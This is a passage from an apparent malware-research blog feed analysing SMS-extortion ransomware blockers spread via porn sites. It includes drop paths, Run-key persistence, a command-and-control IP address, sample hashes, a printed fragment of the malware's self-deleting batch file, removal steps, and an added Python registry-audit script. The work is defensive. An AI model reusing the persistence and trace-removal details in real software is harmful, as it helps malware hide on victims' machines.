<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhHDCAR9I/AAAAAAAAAQE/dX9wqKfvr7Y/s1600/MI_new-ransom-block.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhHDCAR9I/AAAAAAAAAQE/dX9wqKfvr7Y/s400/MI_new-ransom-block.png" width="400" /></a></div><div style="text-align: justify;">As the image shows, it simply presents the user with the requirements for obtaining the password that should, in theory, unlock the system. The annoying window does not cover the whole desktop (which is also very common in ransomware); instead the malicious window sits in the lower right corner of the desktop, on top of any other window.</div><br />
In this case the user is told to send an <b>SMS</b> to <b>86577491</b> with the message <b>6005</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhN1TO9OI/AAAAAAAAAQM/7Kea9mVFCx4/s1600/MI_new-ransom-block-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhN1TO9OI/AAAAAAAAAQM/7Kea9mVFCx4/s400/MI_new-ransom-block-2.png" width="400" /></a></div><div style="text-align: justify;">When the binary runs, a simple BAT script instructs the malicious application to copy itself to <span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media</span> under the name <b>kasper_zaebal.exe</b>, to add a reference in the Run registry key, and to write additional data into the security area.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhVd-qTlI/AAAAAAAAAQU/qNshN60r8hY/s1600/MI_ransom-full.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TEJhVd-qTlI/AAAAAAAAAQU/qNshN60r8hY/s400/MI_ransom-full.png" width="400" /></a></div><div style="text-align: justify;">In parallel it opens a browser session, redirecting traffic to the porn site <b>www.redtube.eu</b>, which resolves to IP address <b>216.155.139.158</b> (<b>AS20473 - CHOOPA</b>), an address classified as a malware server and as C&amp;C of some botnets.</div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
Enter the following code: <b>29543874</b><br />
<br />
If you prefer a more "traditional" removal, follow the steps below: <br />
<br />
Identify and terminate the process named <b>kasper_zaebal.exe</b>; the ransomware window disappears at that moment.<br />
<br />
To kill the process you can use Task Manager or the Sysinternals tool <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" style="color: orange;">Process Explorer</a>.<br />
<br />
Delete the following system information<br />
<br />
Registry: <br />
<span style="font-family: "Courier New",Courier,monospace;">HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Module</span><br />
Value: <br />
<span style="font-family: "Courier New",Courier,monospace;">AModule</span><br />
<span style="font-family: "Courier New",Courier,monospace;">“%ALLUSERSPROFILE%\Media\kasper_zaebal.exe”</span><br />
<br />
You can also use <a href="http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx" style="color: orange;">Autoruns</a> to review the autostart entries in an organised way.<br />
<br />
Folders:<br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media</span><br />
<br />
Files:<br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media\kasper_zaebal.exe</span><br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media\rdb.ba</span><br />
<br />
<b>Related information</b><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-9513338938673349402010-06-20T18:54:00.000+01:002010-06-20T18:57:02.244+01:00New variant of ransomware through porn sites III<div style="text-align: justify;">Another ransomware variant is In-the-Wild. Like the previous variants it spreads through porn sites; the case presented here uses the page <b>axporno.ru</b> as its propagation vector.<br />
<br />
Once it infects the computer, it displays a window that overlaps every other one and shows the information supposedly needed to unlock the system.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TB5STiWDVnI/AAAAAAAAALc/y824MuWCLPU/s1600/ransom.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TB5STiWDVnI/AAAAAAAAALc/y824MuWCLPU/s320/ransom.png" /></a></div><div style="text-align: justify;">When you try to close the image, a new window appears with information on how to get rid of it. The manoeuvre, as usual in the latest generation of blocker-type ransomware, is to push the user into sending a premium-rate SMS with a given text (<b>3381</b>) to a given number (<b>162772132</b>).</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TB5SY24JPmI/AAAAAAAAALk/sj70lezzCwQ/s1600/ransom2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TB5SY24JPmI/AAAAAAAAALk/sj70lezzCwQ/s320/ransom2.png" /></a></div><div style="text-align: justify;">It creates the files <b>sc.ini</b> and <b>delself.bat</b>, both in the System32 folder. The first stores a number associated with the infection and the path of the malware binary, while the second holds the commands used to remove some traces.</div><br />
<b>sc.ini</b><br />
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">600</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media\module.exe</span></span><br />
<br />
<b>delself.bat</b><br />
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">…</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">del C:\Documents and Settings\All Users\Media\module.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">if exist C:\Documents and Settings\All Users\Media\module.exe goto try</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">del C:\WINDOWS\system32\sc.ini</span></span><br />
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">del C:\WINDOWS\system32\delself.bat</span></span><br />
<br />
<div style="text-align: justify;">The malware uses the service <b>SmsCost</b> (<b>smscost.ru</b>) to provide information on the cost of the SMS message.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TB5SnGOFs3I/AAAAAAAAALs/_hhPOfFztGs/s1600/smscost.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TB5SnGOFs3I/AAAAAAAAALs/_hhPOfFztGs/s320/smscost.png" /></a></div><br />
<div style="text-align: justify;">It also promotes another page with sexually explicit material that likewise spreads malware (<b>amporno.ru</b>).</div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
Kill the "module" process through Task Manager (Ctrl + Alt + Del).<br />
Search for and delete the following files:<br />
<ul><li>module.exe <span style="font-size: x-small;">(MD5: 4D6C1F95ED90DDEE122FC749FCE1084E)</span></li>
<li>sc.ini <span style="font-size: x-small;">(MD5: FEADA1AF5309D97A537D02DD6678E847)</span></li>
<li>delself.bat <span style="font-size: x-small;">(MD5: E327DE8BC4BC1183CC9A60776717DA38)</span></li>
</ul>Delete the Media folder C:\Documents and Settings\All Users\Media<br />
<br />
Delete the following value from the registry (the Module value, not the whole Run key):<br />
HKCU\Software\Microsoft\Windows\CurrentVersion\Run<br />
Module > c:\documents and settings\all users\media\module.exe<br />
<br />
Install an up-to-date antivirus product and run a full scan.<br />
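Every write-up above ends with the same manual procedure: find the autostart value the blocker or rogue added under the Run key (the ctfmon.exe entry, the <i>Module</i>/<i>AModule</i> value pointing at run32.exe, process32.exe, kasper_zaebal.exe or module.exe under a <i>Media</i> folder, PC Defender's pcdef.exe) and delete it. The Python script below is an added example, not code from the original posts or from the tools they link: it audits a <i>regedit /e</i> export of the Run keys against those indicators and carries the sample hashes for a quick lookup. The .reg text is constructed for the example (a real export is UTF-16 LE with a BOM and must be decoded first); the value-name heuristic and the rule that a ctfmon.exe outside %SystemRoot%\system32 is suspect are my assumptions based on the posts, not something the posts state.

```python
"""Audit a regedit /e export for the Run-key persistence used by the SMS blockers
and PC Defender.  Added example, not code from the posts.  Assumed workflow:
  regedit /e hklm-run.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  regedit /e hkcu-run.reg "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
then decode the files (UTF-16 LE with BOM) and pass the text to audit_run_entries()."""
import re

# Indicators taken from the write-ups: value names and drop paths recurring across
# the blocker variants, plus the PC Defender autostart image.  (Heuristic, assumed.)
SUSPICIOUS_VALUE_NAMES = {"module", "amodule"}
SUSPICIOUS_IMAGE_RE = re.compile(
    r"\\media\\(run32|process32|module|kasper_zaebal)\.exe$"
    r"|\\def group\\pc defender\\pcdef\.exe$"
)
# The legitimate ctfmon.exe (Text Services loader) lives in %SystemRoot%\system32;
# a Run entry pointing at a ctfmon.exe anywhere else is treated as a lookalike.
LEGIT_CTFMON_RE = re.compile(r"^[a-z]:\\(windows|winnt)\\system32\\ctfmon\.exe$")

# Sample hashes quoted in the posts, for a quick lookup of a suspicious file's MD5.
KNOWN_MD5 = {
    "2e8f56ce39270e10f7082a35d13a735a": "flash_player.exe (SMS blocker, July template update)",
    "acf591ac5ad2a26bf348708dda174b33": "flash_player.exe (variant IV)",
    "4d6c1f95ed90ddee122fc749fce1084e": "module.exe (variant III)",
    "e49be7ef82250a36cf7410004ac3d69c": "exe.exe (Phoenix downloader)",
    "ecff63c1f983858dfd7fb926738cb478": "PCDefenderSilentSetup.msi",
}

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(?:"((?:[^"\\]|\\.)*)"|.+)$')
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?$", re.I)


def _unescape(s):
    """Undo .reg escaping (doubled backslashes and backslash-quote)."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Yield (key, value_name, data) for every string value in a regedit /e export.
    Non-string data (dword:, hex:) carries no image path and is skipped."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key is not None and m.group(2) is not None:
            name = "(Default)" if m.group(1) is None else _unescape(m.group(1))
            yield key, name, _unescape(m.group(2))


def image_path(launch_string):
    """Reduce a Run launch string (quoted or not, with or without arguments) to its executable."""
    s = launch_string.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    m = re.match(r"(.*?\.exe)\b", s, re.I)
    return m.group(1) if m else s


def audit_run_entries(reg_text):
    """Return a list of findings for Run/RunOnce values matching the indicators."""
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        if not RUN_KEY_RE.search(key):
            continue
        path = image_path(data)
        low = path.lower()
        reasons = []
        if name.lower() in SUSPICIOUS_VALUE_NAMES:
            reasons.append("value name used by the SMS blocker family")
        if SUSPICIOUS_IMAGE_RE.search(low):
            reasons.append("image path is a known drop location")
        if low.endswith("\\ctfmon.exe") and not LEGIT_CTFMON_RE.match(low):
            reasons.append("ctfmon.exe outside %SystemRoot%\\system32")
        if reasons:
            findings.append({"key": key, "value": name, "image": path, "reasons": reasons})
    return findings


def lookup_md5(digest):
    """Return the label of a known sample hash, or None."""
    return KNOWN_MD5.get(digest.strip().lower())


# Constructed export (not from a real machine) mixing the posts' entries with benign ones.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Module"="C:\\Documents and Settings\\All Users\\Media\\run32.exe"
"ctfmon"="C:\\Documents and Settings\\All Users\\Media\\ctfmon.exe"
"PC Defender"="c:\\program files\\def group\\PC Defender\\pcdef.exe"
"TextServices"="C:\\WINDOWS\\system32\\ctfmon.exe"
"Adobe Reader Speed Launcher"="\"C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\Reader_sl.exe\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Module"="c:\\documents and settings\\all users\\media\\module.exe"
'''

if __name__ == "__main__":
    for f in audit_run_entries(SAMPLE_REG):
        print(f"{f['key']}\\{f['value']} -> {f['image']}: {'; '.join(f['reasons'])}")
```

The audit only reports; deleting the flagged values is still a manual step (Autoruns or regedit), and the legitimate system32 copy of ctfmon.exe is deliberately left alone. Because the blocker also hides its copy in a <i>Media</i> folder that varies between variants (All Users, Default User, a named account), the image path reported for each finding tells you which folder to remove afterwards.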
<br />
<br />
<b>Related information</b><br />
<div style="color: orange;"><div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html">New variant of ransomware through porn sites II</a></div><div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html">New variant of ransomware through porn sites</a></div><div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html">Another very active SMS Ransomware</a></div><a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a> </div><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com1